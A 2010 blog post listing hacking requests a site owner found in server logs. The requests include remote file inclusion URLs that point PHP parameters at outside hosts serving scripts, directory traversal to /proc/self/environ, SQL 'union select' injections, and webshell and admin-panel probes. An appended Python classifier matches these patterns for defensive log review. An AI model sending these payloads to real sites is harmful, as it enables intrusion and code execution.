Friday, July 23, 2010

Hacking Attempt Examples Received on My Website

Over the past few months I've noticed various hacking attempts that come in spurts. I always review each of these and adjust my site to maintain protection. However, the malicious and persistent penetration attempts continue. Most originate in China, but others come from South America, Eastern Europe, and Russia.

Just for interest, I thought I would post a list of the unique requests my site receives. The list below covers April 2010 to the present and includes only the URL requests.

What surprised me is that over these past 4 months I received 299 unique requests. In reality, though, the person on the other end issued multiple requests, sometimes spanning several days.

If you read the list below, you will notice that most attempt to take advantage of PHP. Others try WordPress, Perl, graphic images, log files, JavaScript, etc.

I'm sure my experience is not unique. If you maintain a website and can review your log files, you may observe similar attempts to violate your site.

Maintaining website security often turns into a full-time job. But if you want to keep your site up and running, it is time well spent!

Example URL Requests
GET /%20%20///index.php?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1
GET /%20%20///index.php?_SERVER[DOCUMENT_ROOT]=http://www.kangnung.org//zb//s1.txt??????? HTTP/1.1
GET /.svn/entries HTTP/1.1
GET //*?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1
GET ///?_PHPLIB[libdir]=http://dancingforcancer.com///g466/sc1?? HTTP/1.1
GET ///index.php?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1
GET ///index.php?_SERVER[DOCUMENT_ROOT]=http://www.babywaves.com//a/pid?? HTTP/1.1
GET ///index.php?_SERVER[DOCUMENT_ROOT]=http://www.kangnung.org//zb//s1.txt??????? HTTP/1.1
GET //?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1
GET //?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1
GET //admin/includes/stylesheet.css HTTP/1.1
GET //b2b/admin/includes/stylesheet.css HTTP/1.1
GET //cart/admin/includes/stylesheet.css HTTP/1.1
GET //catalog/admin/includes/stylesheet.css HTTP/1.1
GET //ecommerce/admin/includes/stylesheet.css HTTP/1.1
GET //eshop/admin/includes/stylesheet.css HTTP/1.1
GET //forum/adminLogin.php?config[forum_installed]=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1
GET //games.php?id=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1
GET //javascript:homeClicked() HTTP/1.1
GET //javascript:megamillionsClicked() HTTP/1.1
GET //javascript:powerballClicked() HTTP/1.1
GET //javascript:showPage2( HTTP/1.1
GET //javascript:showPageScroll( HTTP/1.1
GET //javascript:window.external.AddFavorite(url,
GET //main.php?pageURL=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1
GET //main.php?pageURL=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1
GET //modules/horoscope/footer.php?xoopsConfig[root_path]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1
GET //myadmin/main.php HTTP/1.1
GET //NukeNews/ HTTP/1.1
GET //op.php HTTP/1.1
GET //pma/main.php HTTP/1.1
GET //public/admin/includes/stylesheet.css HTTP/1.1
GET //shop/admin/includes/stylesheet.css HTTP/1.1
GET //shops/admin/includes/stylesheet.css HTTP/1.1
GET //themes/NukeNews/ HTTP/1.1
GET //zc/admin/includes/stylesheet.css HTTP/1.1
GET //ZEN/admin/includes/stylesheet.css HTTP/1.1
GET //zencart/admin/includes/stylesheet.css HTTP/1.1
GET //zen-cart/admin/includes/stylesheet.css HTTP/1.1
GET //zshop/admin/includes/stylesheet.css HTTP/1.1
GET /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6254&STRMVER=4&CAPREQ=0 HTTP/1.1
GET /admin/ HTTP/1.1
GET /administrator/index.php/ HTTP/1.1
GET /administrator/index.php?option=com_config HTTP/1.1
GET /apple-touch-icon.png HTTP/1.1
GET /awstat/awstats.pl HTTP/1.1
GET /awstats.pl HTTP/1.1
GET /awstats/awstats.pl HTTP/1.1
GET /awstats/cgi-bin/awstats.pl HTTP/1.1
GET /awstats6/awstats.pl HTTP/1.1
GET /awstats6/cgi-bin/awstats.pl HTTP/1.1
GET /awstats-cgi/awstats.pl HTTP/1.1
GET /backup/administrator/index.php HTTP/1.1
GET /backup/wp-login.php HTTP/1.1
GET /bak.php HTTP/1.1
GET /blog/backup/wp-login.php HTTP/1.1
GET /blog/wp/wp-login.php HTTP/1.1
GET /blog/wp-login.php HTTP/1.1
GET /blog-old/wp-login.php HTTP/1.1
GET /cgi/awstats.pl HTTP/1.1
GET /cgi-bin/cgihelper.pl HTTP/1.1
GET /cgi-bin/redir.cgi?key=lilou HTTP/1.1
GET /CMS/administrator/index.php HTTP/1.1
GET /cms/wp-login.php HTTP/1.1
GET /cms_old/administrator/index.php HTTP/1.1
GET /content/administrator/index.php HTTP/1.1
GET /copyspeed=pausespeed HTTP/1.1
GET /cp/awstats/awstats.pl HTTP/1.1
GET /cvlyfaisunzip.php HTTP/1.1
GET /dphmwww.rar HTTP/1.1
GET /editors/fckeditor/editor/filemanager/upload/php/ajbcupload.php?Type=Media HTTP/1.1
GET /eljbbak.php HTTP/1.1
GET /en/administrator/index.php HTTP/1.1
GET /engine/engine.php HTTP/1.1
GET /engine/engine.php HTTP/1.1
GET /exchange.php?catid=2&cn=Dating//forum/adminLogin.php?config[forum_installed]=http://syszone.co.kr/bbs/icon/private_name/image1.jpg??? HTTP/1.1
GET /exchange.php?catid=http://217.218.225.2:2082/index.html? HTTP/1.1
GET /expandedOdds//*?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1
GET /expandedOdds/US_MM_expanded.htm//*?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1
GET /expandedOdds/US_PB_expanded.htm///index.php?_SERVER[DOCUMENT_ROOT]=http://www.babywaves.com//a/pid?? HTTP/1.1
GET /faisun_unzip.php HTTP/1.1
GET /faisun_zip.php HTTP/1.1
GET /faisununzip.php HTTP/1.1
GET /faisunzip.php HTTP/1.1
GET /fckeditor/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%252F HTTP/1.1
GET /fckeditor/editor/filemanager/upload/php/cfbmfilename=upload.php?Type=Media HTTP/1.1
GET /fckeditor/editor/filemanager/upload/php/filename=upload.php?Type=Media HTTP/1.1
GET /feed.php/ HTTP/1.1
GET /fhbdfaisun_zip.php HTTP/1.1
GET /FKCeditor/editor/filemanager/upload/php/filename=upload.php?Type=Media HTTP/1.1
GET /FKCeditor/editor/filemanager/upload/php/jonhfilename=upload.php?Type=Media HTTP/1.1
GET /function.mysql-connect HTTP/1.0
GET /games.php//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1
GET /games.php//?path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1
GET /games.php//games.php?id=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1
GET /get_orders_list.php HTTP/1.1
GET /gjhgwwwroot.rar HTTP/1.1
GET /hekxzip.php HTTP/1.1
GET /horoscopes.php%20%20//modules/horoscope/footer.php?xoopsConfig[root_path]=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1
GET /IL HTTP/1.1
GET /images.rar HTTP/1.1
GET /images.zip HTTP/1.1
GET /images/dwogtax.php HTTP/1.1
GET /images/grgyp.html HTTP/1.1
GET /images/info HTTP/1.1
GET /images/jhtp404.php HTTP/1.1
GET /images/kbmvzencart.php HTTP/1.1
GET /images/kmfhunzip.php3.php HTTP/1.1
GET /images/kpuaiporder1.php HTTP/1.1
GET /images/kziwwebshell.php HTTP/1.1
GET /images/mpggphpinfo.php HTTP/1.1
GET /images/NC_outline.gif HTTP/1.1
GET /images/ngkjphpshell.php HTTP/1.1
GET /images/nnwgzip.php HTTP/1.1
GET /images/nqiimy.php HTTP/1.1
GET /images/ohnnzencart1.php HTTP/1.1
GET /images/oqepinfo HTTP/1.1
GET /images/p.html HTTP/1.1
GET /images/qaerip.php HTTP/1.1
GET /images/qgovunzip.php HTTP/1.1
GET /images/qmlwzip.php3.php HTTP/1.1
GET /images/qokainc.php HTTP/1.1
GET /images/qruw1314.php HTTP/1.1
GET /images/qzhgweb.php HTTP/1.1
GET /images/reaf2009.php HTTP/1.1
GET /images/sooj12.php HTTP/1.1
GET /images/uvyhshell.php HTTP/1.1
GET /images/wikimedia-button.png HTTP/1.1
GET /images/wjgwadmin.php HTTP/1.1
GET /images/zvzeadd.php HTTP/1.1
GET /imgs/custom-space.gif HTTP/1.1
GET /index.php?page=http://gosi.lec.co.kr/DB//skin_shop/standard/3_plugin_twindow/myid.jpg?? HTTP/1.1
GET /index.php?page=http://www.4ceda.org/xsml.jpg? HTTP/1.1
GET /InternedData10 HTTP/1.0
GET /iphone/ HTTP/1.1
GET /j/administrator/index.php HTTP/1.1
GET /javascript:homeClicked() HTTP/1.1
GET /javascript:lotto649Clicked() HTTP/1.1
GET /javascript:megamillionsClicked() HTTP/1.1
GET /javascript:powerballClicked() HTTP/1.1
GET /javascript:showPage2(%20 HTTP/1.1
GET /javascript:showPageScroll(%20 HTTP/1.1
GET /javascript:super7Clicked() HTTP/1.1
GET /jcwdimages.zip HTTP/1.1
GET /joom/administrator/index.php HTTP/1.1
GET /joomla/administrator/index.php HTTP/1.1
GET /joomla_old/administrator/index.php HTTP/1.1
GET /joomla1.5/administrator/index.php HTTP/1.1
GET /joomla1/administrator/index.php HTTP/1.1
GET /joomla15/administrator/index.php HTTP/1.1
GET /joomla2/administrator/index.php HTTP/1.1
GET /jxgeweb.rar HTTP/1.1
GET /kqfyunzip.php HTTP/1.1
GET /links.htm%20%20///index.php?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1
GET /links.htm%20%20///index.php?_SERVER[DOCUMENT_ROOT]=http://www.kangnung.org//zb//s1.txt??????? HTTP/1.1
GET /llucwww.zip HTTP/1.1
GET /m/ HTTP/1.0
GET /main/administrator/index.php HTTP/1.1
GET /mobi/ HTTP/1.1
GET /mobile/headline.htm HTTP/1.1
GET /mobile/home.php HTTP/1.1
GET /mobile/l HTTP/1.1
GET /mobile/this.value HTTP/1.1
GET /mobile/this.value%22 HTTP/1.1
GET /moreinfo/index.php HTTP/1.0
GET /myunzip.php HTTP/1.1
GET /myzip.php HTTP/1.1
GET /ngleweb.zip HTTP/1.1
GET /old/wp-login.php HTTP/1.1
GET /oqwwshenbin.zip HTTP/1.1
GET /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder= HTTP/1.0
GET /portal/administrator/index.php HTTP/1.1
GET /rkizmyzip.php HTTP/1.1
GET /server-status HTTP/1.1
GET /shenbin.zip HTTP/1.1
GET /Site/administrator/index.php HTTP/1.1
GET /Site_old/administrator/index.php HTTP/1.1
GET /sites/all/README.txt/ HTTP/1.1
GET /stat/awstats.pl HTTP/1.1
GET /statistic/awstats.pl HTTP/1.1
GET /statistics/awstats.pl HTTP/1.1
GET /stats/cgi-bin/awstats.pl HTTP/1.1
GET /store_gc_autoanything.php?gccid=6060777 HTTP/1.1
GET /store_gc_autoanything.php?gccid=6060777%20and%201=2%20union%20select%20CONCAT(0x27,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c), CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c), CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c), CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c), CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1
GET /store_gc_AutoAnything.php?gccid=6060893 HTTP/1.0
GET /store_gc_AutoAnything.php?gccid=6103341%20%20//main.php?pageURL=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1
GET /store_gc_eBags.php%253Fgccid%253D8189197//main.php?pageURL=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1
GET /store_gc_eBags.php?gccid=5162395&gcp=7/index.php?page=http://www.4ceda.org/xsml.jpg? HTTP/1.1
GET /store_gc_eBags.php?gccid=8189197%20%20//main.php?pageURL=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1
GET /store_gc_everythingfurniture.php?gccid=7002820%20and%201=2%20union%20select%20CONCAT(0x27,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c), CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1
GET /store_gc_proboardshop.php?gccid=5873595%20and%201=2%20union%20select%20CONCAT(0x27,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c), CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c), CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c), CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c),CONCAT(0x27,0x7c,0x5f,0x7c)%20/* HTTP/1.1
GET /store_overstock.php?gccid=http://www.capefearcoast.com/resources/pdfs/dmc.txt? HTTP/1.1
GET /system-cgi/awstats.pl HTTP/1.1
GET /templates/ HTTP/1.1
GET /test/administrator/index.php HTTP/1.1
GET /theme/iamsdp/imgs/khmer-header.png HTTP/1.1
GET /theme/iamsdp/imgs/sign_p.png HTTP/1.1
GET /thilfaisununzip.php HTTP/1.1
GET /typo3/index.php/ HTTP/1.1
GET /typolight/index.php/ HTTP/1.1
GET /unzip.php HTTP/1.1
GET /url
GET /URL HTTP/1.1
GET /v1/administrator/index.php HTTP/1.1
GET /v2/administrator/index.php HTTP/1.1
GET /vehzfaisun_unzip.php HTTP/1.1
GET /w3c/p3p.xml HTTP/1.1
GET /web.rar HTTP/1.1
GET /web.zip HTTP/1.1
GET /web/administrator/index.php HTTP/1.1
GET /webstats/awstats.pl HTTP/1.1
GET /wordpress/wp-login.php HTTP/1.1
GET /wordpress2/wp-login.php HTTP/1.1
GET /WP/wp-login.php HTTP/1.1
GET /wp-admin/ HTTP/1.1
GET /wp-comments-post.php HTTP/1.0
GET /wp-login.php HTTP/1.1
GET /www.rar HTTP/1.1
GET /www.zip HTTP/1.1
GET /wwwroot.rar HTTP/1.1
GET /wwwroot.zip HTTP/1.1
GET /ybtewwwroot.zip HTTP/1.1
GET /yzmqimages.rar HTTP/1.1
GET /zip.php HTTP/1.1
GET /zsmcmyunzip.php HTTP/1.1
HEAD /phpmyadmin/scripts/setup.php HTTP/1.1
HEAD /urllist.txt? HTTP/1.0
POST /administrator/index.php HTTP/1.1
POST /index.php?action=linkadded HTTP/1.1
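As an added example (not part of the original post), here is a small Python classifier that sorts request lines like the ones above into the attack families they represent: remote file inclusion, directory traversal, SQL injection, admin/login probing, backup-archive guessing, webshell probing and tool fingerprinting. The rule patterns are my own heuristics derived from the list, not a published signature set, and the sample lines are constructed from request shapes in the post.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Ordered (category, pattern) rules; the first match wins, so the more
# specific injection patterns come before the generic probe patterns.
RULES = [
    ("remote-file-include", re.compile(r"[?&][^=&]*=https?://", re.I)),
    ("path-traversal", re.compile(r"(\.\./){2,}|/proc/self/environ", re.I)),
    ("sql-injection", re.compile(r"\b(union\s+select|and\s+1=2)\b", re.I)),
    ("admin-login-probe", re.compile(
        r"wp-login\.php|/administrator/index\.php|/admin/|phpmyadmin|/pma/|/myadmin/", re.I)),
    ("backup-archive-probe", re.compile(r"\.(zip|rar)$", re.I)),
    ("webshell-probe", re.compile(r"(shell|unzip|zip|phpinfo)\w*\.php", re.I)),
    ("tool-probe", re.compile(
        r"awstats\.pl|fckeditor|tinybrowser|\.svn/entries|server-status", re.I)),
]

# "METHOD target [HTTP/x.y]" as the request lines in the list are written.
REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<target>\S+)")

def classify(request_line):
    """Return the attack family of one request line, or 'benign'."""
    m = REQUEST_LINE.match(request_line.strip())
    if not m:
        return "unparseable"
    # Decode twice so double-encoded probes (e.g. %253F -> %3F -> ?) are seen.
    target = unquote(unquote(m.group("target")))
    for name, pattern in RULES:
        if pattern.search(target):
            return name
    return "benign"

def summarize(request_lines):
    # Count request lines per category (constructed log review helper).
    return Counter(classify(line) for line in request_lines)

# Constructed sample taken from the request shapes listed in the post.
SAMPLE = [
    "GET /index.php?page=http://www.4ceda.org/xsml.jpg? HTTP/1.1",
    "GET //*?option=com_janews&controller=../../../../proc/self/environ HTTP/1.1",
    "GET /store_gc_proboardshop.php?gccid=5873595%20and%201=2%20union%20select%201%20/* HTTP/1.1",
    "GET /blog/wp-login.php HTTP/1.1",
    "GET /wwwroot.rar HTTP/1.1",
    "GET /images/kziwwebshell.php HTTP/1.1",
    "GET /images/NC_outline.gif HTTP/1.1",
]

if __name__ == "__main__":
    for category, count in summarize(SAMPLE).most_common():
        print(f"{count:3d}  {category}")
```

Feed it the request column of your own access log to get a per-family count; a sudden jump in one family is the "spurt" the post describes and is a good trigger for reviewing the rules on the site.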